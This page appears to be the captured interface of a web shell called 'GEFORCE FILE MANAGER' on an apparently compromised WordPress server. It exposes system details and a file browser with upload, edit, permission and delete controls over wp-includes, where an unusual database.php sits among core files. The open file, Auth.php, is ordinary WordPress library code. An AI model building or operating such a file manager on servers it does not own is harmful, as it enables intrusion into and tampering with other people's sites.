[ SYSTEM ]: Linux wordpress 6.1.0-41-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.158-1 (2025-11-09) x86_64
[ SERVER ]: Apache/2.4.66 (Debian) | PHP: 8.2.30
[ USER ]: www-data | IP: 172.19.30.54
GEFORCE FILE MANAGER
/
var
/
www
/
html
/
wordpress
/
wp-includes
/
Requests
/
src
/
UPLOAD:
NAME
SIZE
QUICK PERMS
ACTIONS
📁 Auth
SET
[ DEL ]
📁 Cookie
SET
[ DEL ]
📁 Exception
SET
[ DEL ]
📁 Proxy
SET
[ DEL ]
📁 Response
SET
[ DEL ]
📁 Transport
SET
[ DEL ]
📁 Utility
SET
[ DEL ]
📄 Auth.php
860 B
SET
[ EDIT ]
|
[ DEL ]
📄 Autoload.php
9,335 B
SET
[ EDIT ]
|
[ DEL ]
📄 Capability.php
652 B
SET
[ EDIT ]
|
[ DEL ]
📄 Cookie.php
15,389 B
SET
[ EDIT ]
|
[ DEL ]
📄 Exception.php
1,114 B
SET
[ EDIT ]
|
[ DEL ]
📄 HookManager.php
709 B
SET
[ EDIT ]
|
[ DEL ]
📄 Hooks.php
3,032 B
SET
[ EDIT ]
|
[ DEL ]
📄 IdnaEncoder.php
12,435 B
SET
[ EDIT ]
|
[ DEL ]
📄 Ipv6.php
5,639 B
SET
[ EDIT ]
|
[ DEL ]
📄 Iri.php
29,622 B
SET
[ EDIT ]
|
[ DEL ]
📄 Port.php
1,505 B
SET
[ EDIT ]
|
[ DEL ]
📄 Proxy.php
867 B
SET
[ EDIT ]
|
[ DEL ]
📄 Requests.php
34,001 B
SET
[ EDIT ]
|
[ DEL ]
📄 Response.php
4,281 B
SET
[ EDIT ]
|
[ DEL ]
📄 Session.php
9,107 B
SET
[ EDIT ]
|
[ DEL ]
📄 Ssl.php
5,425 B
SET
[ EDIT ]
|
[ DEL ]
📄 Transport.php
1,544 B
SET
[ EDIT ]
|
[ DEL ]
📄 database.php
943 B
SET
[ EDIT ]
|
[ DEL ]
DELETE SELECTED
[ CLOSE ]
EDIT: Auth.php
<?php /** * Authentication provider interface * * @package Requests\Authentication */ namespace WpOrg\Requests; use WpOrg\Requests\Hooks; /** * Authentication provider interface * * Implement this interface to act as an authentication provider. * * Parameters should be passed via the constructor where possible, as this * makes it much easier for users to use your provider. * * @see \WpOrg\Requests\Hooks * * @package Requests\Authentication */ interface Auth { /** * Register hooks as needed * * This method is called in {@see \WpOrg\Requests\Requests::request()} when the user * has set an instance as the 'auth' option. Use this callback to register all the * hooks you'll need. * * @see \WpOrg\Requests\Hooks::register() * @param \WpOrg\Requests\Hooks $hooks Hook system */ public function register(Hooks $hooks); }